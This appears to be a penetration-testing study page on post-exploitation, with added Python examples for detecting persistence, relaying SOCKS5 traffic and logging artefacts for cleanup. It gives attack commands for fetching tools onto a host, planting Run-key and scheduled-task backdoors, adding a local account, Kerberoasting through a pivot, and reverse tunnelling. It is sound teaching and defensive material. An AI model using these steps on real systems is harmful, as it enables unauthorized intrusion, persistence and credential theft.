# 5. Post Exploitation

## File transfers

```bash
# HTTP via Python (serves the current directory; port 80 needs root, any high port works)
python3 -m http.server 80

# Windows - Certutil (-split writes the download to a file instead of leaving it only in the URL cache)
certutil.exe -urlcache -split -f <URL-TO-FILE> <OUTPUT-FILE>

# Linux
wget <URL>

...
```

Whatever the method, compare a hash on both ends (`sha256sum` on Linux, `certutil -hashfile <FILE> SHA256` on Windows) before running a transferred binary: a truncated download through a flaky pivot fails in ways that look like AV, and the hash also goes in the cleanup list.

***

## Maintain access

➡️ **Maintaining access** during a penetration test refers to the techniques used to **retain control over a compromised system** across reboots, credential changes and patching. It is a core part of **post-exploitation**: the tester reproduces real-world attacker **persistence** so that the organization's ability to detect and respond to it can be measured. Every persistence artefact is recorded as it is created, because each one has to be removed again during cleanup.

**Metasploit persistence methods**

1. **Persistence modules and scripts:**
   * `run persistence -h` → Displays the options of the legacy Meterpreter persistence script (deprecated in favour of the modules below).
   * `exploit/windows/local/persistence` → Drops a VBS launcher for the payload and registers it in a **Run key**, creating a **backdoor** that comes back at logon or boot.
   * `exploit/windows/local/registry_persistence` → Stores the payload entirely in the **Windows Registry** and triggers it from a `CurrentVersion\Run` value.
2. **Scheduled Tasks:**
   * `run scheduleme` → Meterpreter script that creates a **scheduled task** to execute a payload at an interval, at logon or at startup.
   * `run schtasksabuse` → Meterpreter script that **abuses schtasks** to run commands on the target (or a list of hosts) to maintain access.
3. **User Account Manipulation:**
   * `net user hacker password123 /add` → Creates a **new local user account**. On its own it has no admin rights, so testers usually also add it to `Administrators` or `Remote Desktop Users` with `net localgroup`, which is a second, louder event.

All of these survive a reboot or network disconnection, and each leaves a distinct trace: a scheduled task (Security event 4698 when task auditing is on), a Run-key value (4657 if the key has a SACL, or Sysmon event 13), a new account (4720) and a group change (4732). Monitoring exactly those is how the blue team is expected to catch this phase, and whether they do is part of what the test measures.
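How a blue team would spot the artefacts above, as an added example that is not from the original page: a small Python rule set run over constructed Windows event records (the `SAMPLE_EVENTS` list is made up for this example; the keys follow the EventData field names of each event, the values are invented). It maps the page's techniques to the events they produce: `net user /add` to 4720 and the follow-up `net localgroup` to 4732, the scheduled-task scripts to 4698, the Run-key modules to 4657 (which needs a SACL on the key), and a service install to System event 7045. A new account that lands straight in a privileged group is escalated to one high-severity finding, and the Defrag task shows why the rule judges what a task runs rather than where it lives: a benign Microsoft task is not flagged, and an attacker hiding a task under `\Microsoft\Windows\` still is.

```python
import re

# Constructed Windows event records for this example (not real log data). Keys follow the EventData
# field names of each event; only the fields the rules read are present.
SAMPLE_EVENTS = [
    {"EventID": 4624, "SubjectUserName": "-", "TargetUserName": "jdoe"},
    {"EventID": 4720, "SubjectUserName": "jdoe", "TargetUserName": "hacker"},
    # real 4732 records often carry only MemberSid; resolve it to a name before feeding it to the rule
    {"EventID": 4732, "SubjectUserName": "jdoe", "MemberName": "hacker", "TargetUserName": "Administrators"},
    {"EventID": 4698, "SubjectUserName": "jdoe", "TaskName": "\\Updater",
     "TaskContent": "<Exec><Command>powershell.exe</Command>"
                    "<Arguments>-nop -w hidden -enc QQBCAEMA</Arguments></Exec>"},
    {"EventID": 4698, "SubjectUserName": "SYSTEM", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": "<Exec><Command>%windir%\\system32\\defrag.exe</Command></Exec>"},
    {"EventID": 4657, "SubjectUserName": "jdoe", "ObjectValueName": "svc", "NewValue": "C:\\Users\\Public\\svc.exe",
     "ObjectName": "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"},
    {"EventID": 7045, "ServiceName": "WinSvcUpdate", "ImagePath": "C:\\Users\\Public\\svc.exe", "StartType": "auto start"},
]

PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users", "Remote Management Users"}
AUTORUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
SCRIPT_HOST = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?\b", re.I)
ENCODED_ARG = re.compile(r"\s-e(nc(odedcommand)?|c|n)?\s", re.I)   # every prefix PowerShell accepts for -EncodedCommand
USER_WRITABLE = re.compile(r"\\(Users\\Public|Temp|AppData|ProgramData)\\", re.I)


def _finding(event, rule, severity, detail):
    return {"event_id": event["EventID"], "rule": rule, "severity": severity,
            "actor": event.get("SubjectUserName", "-"), "detail": detail}


def detect_persistence(events):
    """Return one finding per event that matches a persistence technique from this section, in log order."""
    findings = []
    new_accounts = {e["TargetUserName"] for e in events if e["EventID"] == 4720}
    for e in events:
        eid = e["EventID"]
        if eid == 4720:                                                  # net user <name> <pw> /add
            findings.append(_finding(e, "local account created", "medium", e["TargetUserName"]))
        elif eid == 4732 and e["TargetUserName"] in PRIVILEGED_GROUPS:   # net localgroup Administrators <name> /add
            # a brand-new account going straight into a privileged group is the persistence pattern: escalate
            severity = "high" if e["MemberName"] in new_accounts else "medium"
            findings.append(_finding(e, f"member added to {e['TargetUserName']}", severity, e["MemberName"]))
        elif eid == 4698:                                                # scheduleme / schtasks: judge the action, not the path
            content = e["TaskContent"]
            if SCRIPT_HOST.search(content) or USER_WRITABLE.search(content):
                severity = "high" if ENCODED_ARG.search(content) else "medium"
                findings.append(_finding(e, "scheduled task runs a script host or user-writable binary", severity, e["TaskName"]))
        elif eid == 4657 and AUTORUN_KEY.search(e["ObjectName"]):        # persistence / registry_persistence Run-key value
            findings.append(_finding(e, "autorun registry value written", "high", f"{e['ObjectValueName']} = {e['NewValue']}"))
        elif eid == 7045 and USER_WRITABLE.search(e["ImagePath"]):       # service binary in a directory any user can write
            findings.append(_finding(e, "service installed from user-writable path", "high", e["ImagePath"]))
    return findings
```

The allow-by-content choice is deliberate: a task-path allowlist is bypassed by naming the task like a Microsoft one, whereas a task that starts `powershell.exe` with `-enc` is suspicious wherever it is registered. The same rules can be pointed at exported EVTX-to-JSON records unchanged, since the field names are the ones Windows emits.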

***

## Pivoting

➡️ **Pivoting** is a technique used in penetration testing to **move laterally** within a network after compromising an initial system. It allows an attacker to **route traffic through the compromised machine** to access other internal systems that are otherwise unreachable from the external network.

### proxychains

➡️ [proxychains](https://github.com/haad/proxychains) - tool that forces any TCP connection initiated by an application to route through user-defined proxy servers, such as TOR or other SOCKS4, SOCKS5, or HTTP(S) proxies. It works by `LD_PRELOAD`-hooking `connect()`, so it only affects dynamically linked programs and only TCP: ICMP, UDP and raw-socket traffic (ping, nmap SYN scans, most DNS) bypass it and leave the attacking machine directly, which is why the nmap line below uses a connect scan and skips host discovery.

```bash
cat /etc/proxychains4.conf
# check the socks4 port: the default entry is "socks4 127.0.0.1 9050", which the ssh -D port below matches;
# proxy_dns makes proxychains hand hostnames to the proxy so lookups happen on the pivot

# dynamic SOCKS forward on the pivot: -f background, -N no remote command, -D local SOCKS listener on 9050
ssh -f -N -D 9050 -i pivot <USER>@<VICTIM-IP>

# e.g. pivoting
# proxychains only hooks TCP connect(): connect scan, no ping, and expect it to be slow
proxychains nmap -sT -Pn -p <PORT> <INTERNAL-IP>

proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip <IP> -request

proxychains xfreerdp /u:administrator /p:'p@ssword' /v:<IP>

proxychains firefox
```
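What the `ssh -D` plus proxychains pair is actually doing on the wire, as an added example rather than anything from the original page: a minimal SOCKS5 CONNECT relay in Python (the `ssh -D` side), a client that speaks the handshake proxychains injects under the wrapped tool, and a constructed echo service standing in for an internal-only host. Everything runs on 127.0.0.1 with ephemeral ports, and every function name here is this example's own. It also shows the two details a practitioner relies on: the `ATYP_DOMAIN` branch is what `proxy_dns` depends on (the pivot, not the attacker, resolves the name), and a closed target port comes back as SOCKS reply `0x05` (connection refused) rather than a hang.

```python
import socket
import threading

# SOCKS5 (RFC 1928) values; only CONNECT with 'no auth' is implemented, which is what `ssh -D` offers proxychains.
VER, NO_AUTH, NO_ACCEPTABLE, CMD_CONNECT = 0x05, 0x00, 0xFF, 0x01
ATYP_IPV4, ATYP_DOMAIN, REP_OK, REP_UNREACHABLE, REP_REFUSED = 0x01, 0x03, 0x00, 0x04, 0x05


def _recv_exact(sock, n):
    """SOCKS fields are fixed-size: a short read means the peer went away, which is an error."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf


def _pump(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the far end sees EOF as well."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass


def handle_socks_client(conn):
    """Pivot side: the job `ssh -D` does for each connection proxychains hands it."""
    ver, nmethods = _recv_exact(conn, 2)                  # greeting: VER NMETHODS METHODS...
    if ver != VER or NO_AUTH not in _recv_exact(conn, nmethods):
        conn.sendall(bytes([VER, NO_ACCEPTABLE]))
        return conn.close()
    conn.sendall(bytes([VER, NO_AUTH]))                   # method selection
    _ver, _cmd, _rsv, atyp = _recv_exact(conn, 4)         # request: VER CMD RSV ATYP DST.ADDR DST.PORT
    if atyp == ATYP_IPV4:
        host = socket.inet_ntoa(_recv_exact(conn, 4))
    else:                                                 # ATYP_DOMAIN: the name is resolved here, on the pivot
        host = _recv_exact(conn, _recv_exact(conn, 1)[0]).decode()
    port = int.from_bytes(_recv_exact(conn, 2), "big")
    try:                                                  # made FROM the pivot: this is the hop into the internal net
        remote, rep = socket.create_connection((host, port), timeout=3), REP_OK
    except ConnectionRefusedError:
        remote, rep = None, REP_REFUSED
    except OSError:
        remote, rep = None, REP_UNREACHABLE
    bound = remote.getsockname() if remote else ("0.0.0.0", 0)
    conn.sendall(bytes([VER, rep, 0x00, ATYP_IPV4]) + socket.inet_aton(bound[0]) + bound[1].to_bytes(2, "big"))
    if remote is None:
        return conn.close()                               # failure already reported in the reply code
    threading.Thread(target=_pump, args=(remote, conn), daemon=True).start()
    _pump(conn, remote)                                   # relay both ways until each side hits EOF


def socks5_connect(proxy, target, payload):
    """Client side: the connect() proxychains swaps in under the wrapped tool. Returns (reply code, bytes)."""
    host, port = target
    with socket.create_connection(proxy, timeout=3) as s:
        s.sendall(bytes([VER, 0x01, NO_AUTH]))            # offer exactly one auth method
        if _recv_exact(s, 2) != bytes([VER, NO_AUTH]):
            return NO_ACCEPTABLE, b""
        try:
            addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
        except OSError:                                   # not a dotted quad: ship the name, let the pivot resolve it
            addr = bytes([ATYP_DOMAIN, len(host)]) + host.encode()
        s.sendall(bytes([VER, CMD_CONNECT, 0x00]) + addr + port.to_bytes(2, "big"))
        _ver, rep, _rsv, atyp = _recv_exact(s, 4)
        if rep != REP_OK:
            return rep, b""
        _recv_exact(s, 6 if atyp == ATYP_IPV4 else _recv_exact(s, 1)[0] + 2)  # discard BND.ADDR/BND.PORT
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        return rep, b"".join(iter(lambda: s.recv(4096), b""))


def serve(handler):
    """Listen on an ephemeral 127.0.0.1 port, run handler(conn) per client in a thread, return the port."""
    lsock = socket.socket()
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(8)
    def loop():
        while True:
            threading.Thread(target=handler, args=(lsock.accept()[0],), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return lsock.getsockname()[1]


def echo_handler(conn):
    _pump(conn, conn)                                     # constructed stand-in for an internal-only service
    conn.close()


def demo():
    """Reach the constructed 'internal' echo service only through the SOCKS pivot."""
    internal_port, socks_port = serve(echo_handler), serve(handle_socks_client)
    return socks5_connect(("127.0.0.1", socks_port), ("127.0.0.1", internal_port), b"hello via pivot")


def demo_refused():
    """Ask the pivot for a port nobody listens on: the reply code, not a hang, reports the failure."""
    with socket.socket() as probe:
        probe.bind(("127.0.0.1", 0))
        closed_port = probe.getsockname()[1]
    return socks5_connect(("127.0.0.1", serve(handle_socks_client)), ("127.0.0.1", closed_port), b"")[0]
```

Passing a hostname instead of an IP to `socks5_connect` takes the `ATYP_DOMAIN` path, which is the behaviour `proxy_dns` gives you: the lookup happens on the pivot and never leaves the attacking machine as a DNS packet. Note that nothing here intercepts raw sockets, which is the same limitation proxychains has.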

### sshuttle

➡️ [sshuttle](https://github.com/sshuttle/sshuttle) - transparent proxy server that forwards over SSH, supports DNS tunneling. Unlike proxychains it needs no per-command wrapper: it adds local firewall rules that redirect all TCP traffic for the given subnets through the SSH session, so it needs root locally and a Python interpreter on the pivot. TCP only (plus DNS with `--dns`); UDP and ICMP still go direct.

```bash
# -r = remote pivot host, then the internal subnet(s) to route through it; --ssh-cmd passes the key file
sshuttle -r <USER>@<IP> <NEW-NETWORK/24> --ssh-cmd "ssh -i pivot"
# keep this terminal open: the redirect rules are removed when sshuttle exits
# run commands in other terminals, unwrapped; add --dns to resolve internal names via the pivot
```

### chisel

➡️ [chisel](https://github.com/jpillora/chisel) - a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Being a single static Go binary, it is the fallback when the pivot has no SSH server or port 22 is filtered: a `chisel server` started with `--reverse` on the attacking machine plus a `chisel client` on the pivot requesting the `R:socks` remote exposes a SOCKS5 listener on the attacker side (port 1080 by default) that proxychains can use exactly like the `ssh -D` listener above. Because the transport is HTTP(S), it can also be pointed at an outbound web proxy, and it works from Windows pivots where `ssh -D` is not an option.

***

## Cleaning up

➡️ The **cleanup phase** is the final step in a penetration test, ensuring that **no test artefacts** remain on the target system or network once the engagement ends.

The goal is to return the environment to the state it was in before the test, minimizing the security risk the test itself introduced (a forgotten backdoor or account is a real attacker's way in) and avoiding any disruption. This only works if artefacts were logged as they were created, so cleanup is a checklist rather than a memory exercise.

* **Remove files** – Delete scripts, executables, payloads and any other added files (including transferred tools and their hashes from the transfer step).
* **Eliminate persistence** – Remove implants, backdoors, scheduled tasks, Run-key values, services and added user accounts, i.e. every item from the maintain-access section.
* **Restore settings** – Revert changed settings, security configs, firewall rules, and permissions; restore from the copy taken before the change and verify it, rather than re-typing the value from memory.
* **Clear tracks** – Wipe command history and test-generated logs only where the rules of engagement allow it. On a contracted test the client's logs are theirs and are the record of what was exercised, so the usual deliverable is a complete list of artefacts with timestamps, not wiped logs.

📌 From a hacker perspective, you need to "**make it look like you were never there**".
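A way to make that cleanup list enforceable, as an added example that is not part of the original page: a Python artefact log that records every file dropped, every file modified (taking a copy and a hash before the edit), and every account and task as it is created, appending to a JSON-lines file so the list survives a lost session; it then rolls everything back in reverse order and verifies each restored file against the recorded hash. Files are reverted by the script itself; accounts and tasks are turned into the undo commands (`net user <user> /delete`, `schtasks /delete /tn <name> /f`) for the operator and the report. The scratch files, names and the "config" contents in `demo()` are constructed for the example.

```python
import hashlib
import json
import os
import shutil
import tempfile

# Undo commands for artefacts this script cannot remove itself; they go into the report for the operator.
MANUAL_UNDO = {"account_created": "net user {user} /delete", "task_created": "schtasks /delete /tn {name} /f"}


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


class EngagementLog:
    """Append-only JSON-lines record of every artefact the test leaves, written as each one is created."""

    def __init__(self, path, entries=None):
        self.path, self.entries = path, list(entries or [])

    @classmethod
    def load(cls, path):
        with open(path) as fh:
            return cls(path, [json.loads(line) for line in fh if line.strip()])

    def _record(self, **entry):
        self.entries.append(entry)
        with open(self.path, "a") as fh:              # one line per artefact: a crashed session still leaves the list
            fh.write(json.dumps(entry) + "\n")

    def created_file(self, path):
        self._record(kind="file_created", path=path, sha256=sha256_of(path))   # hash goes in the report too

    def before_modifying(self, path):
        """Call BEFORE editing a config file: keeps a copy beside the log plus the hash of the original."""
        backup = f"{self.path}.{len(self.entries)}.orig"
        shutil.copy2(path, backup)
        self._record(kind="file_modified", path=path, backup=backup, sha256=sha256_of(path))

    def created_account(self, user):
        self._record(kind="account_created", user=user)

    def created_task(self, name):
        self._record(kind="task_created", name=name)

    def rollback(self):
        """Undo in reverse creation order; report what was reverted, what needs a hand, and what did not verify."""
        report = {"reverted": [], "manual": [], "failed": []}
        for e in reversed(self.entries):
            if e["kind"] == "file_created":
                if os.path.exists(e["path"]):
                    os.remove(e["path"])
                    report["reverted"].append(e)
                else:
                    report["failed"].append({**e, "why": "already missing: removed by someone else, or never landed"})
            elif e["kind"] == "file_modified":
                shutil.copy2(e["backup"], e["path"])
                if sha256_of(e["path"]) == e["sha256"]:   # prove the original is really back before discarding the copy
                    os.remove(e["backup"])
                    report["reverted"].append(e)
                else:
                    report["failed"].append({**e, "why": "restored content does not match the recorded hash"})
            else:
                report["manual"].append(MANUAL_UNDO[e["kind"]].format(**e))
        return report


def demo():
    """Scratch-directory run: edit a 'config', drop a 'tool', add an 'account' and a 'task', then roll back."""
    work = tempfile.mkdtemp()
    config, tool = os.path.join(work, "sshd_config"), os.path.join(work, "linpeas.sh")
    with open(config, "w") as fh:
        fh.write("PermitRootLogin no\n")                 # constructed 'original' setting
    log = EngagementLog(os.path.join(work, "engagement.jsonl"))
    log.before_modifying(config)
    with open(config, "w") as fh:
        fh.write("PermitRootLogin yes\n")                # the change made during the test
    with open(tool, "w") as fh:
        fh.write("#!/bin/sh\necho constructed tool\n")
    log.created_file(tool)
    log.created_account("hacker")
    log.created_task("Updater")
    report = EngagementLog.load(log.path).rollback()    # reload from disk: works even if the original session died
    with open(config) as fh:
        report["config_after"] = fh.read()
    report["tool_exists"] = os.path.exists(tool)
    shutil.rmtree(work)
    return report
```

The log file itself is the one artefact `rollback()` never deletes: it is the evidence that goes into the report, and the `failed` list is what you hand the client to check by hand instead of claiming the box is clean.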

***
